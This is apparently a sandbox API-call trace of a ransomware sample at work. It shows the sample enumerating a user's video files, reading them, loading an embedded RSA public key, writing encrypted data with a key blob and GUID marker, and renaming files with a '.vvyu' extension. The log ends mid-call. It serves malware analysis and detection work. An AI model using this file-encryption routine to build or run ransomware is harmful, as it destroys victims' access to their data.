[0202.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0202.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0202.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0202.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e90110 | out: hHeap=0x620000) returned 1 [0202.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.045] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xf386, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xf386, lpOverlapped=0x0) returned 1 [0202.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.046] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xf38b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.046] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.048] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.048] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.048] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.048] CloseHandle (hObject=0x510) returned 1 [0202.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0202.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.050] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\38n2O1ISSPYQrTiC8.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\38n2o1isspyqrtic8.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\38n2O1ISSPYQrTiC8.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\38n2o1isspyqrtic8.mp4.vvyu")) returned 1 [0202.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.052] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.055] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee69e690, ftCreationTime.dwHighDateTime=0x1d89c64, ftLastAccessTime.dwLowDateTime=0xd03f4cb0, ftLastAccessTime.dwHighDateTime=0x1d89d30, ftLastWriteTime.dwLowDateTime=0xd03f4cb0, ftLastWriteTime.dwHighDateTime=0x1d89d30, nFileSizeHigh=0x0, nFileSizeLow=0x10d0f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8fbu8GjzXGN5dWk.avi", cAlternateFileName="8FBU8G~1.AVI")) returned 1 [0202.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0202.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.055] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\8fbu8GjzXGN5dWk.avi") returned=".avi" [0202.055] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\8fbu8GjzXGN5dWk.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\8fbu8gjzxgn5dwk.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.056] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=68879) returned 1 [0202.056] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.058] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x10ce9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.059] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.062] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.062] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x10d0f, lpOverlapped=0x0) returned 1 [0202.063] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.063] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.063] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.063] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.064] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.064] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.064] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.064] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.064] GetLastError () returned 0x0 [0202.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.064] GetLastError () returned 0x0 [0202.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.065] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.065] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.066] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.066] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.066] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10d10) returned 0x2ea99b0 [0202.067] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90110 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90158 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.068] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0202.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35c0 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea35a8 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0202.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0202.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0202.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.071] GetCurrentThreadId () returned 0x66c [0202.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8f28 [0202.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.072] GetCurrentThreadId () returned 0x66c [0202.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0202.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35c0 [0202.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0202.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3620 [0202.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0202.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0202.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3638 [0202.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35d8 [0202.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35a8 [0202.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0202.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0202.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 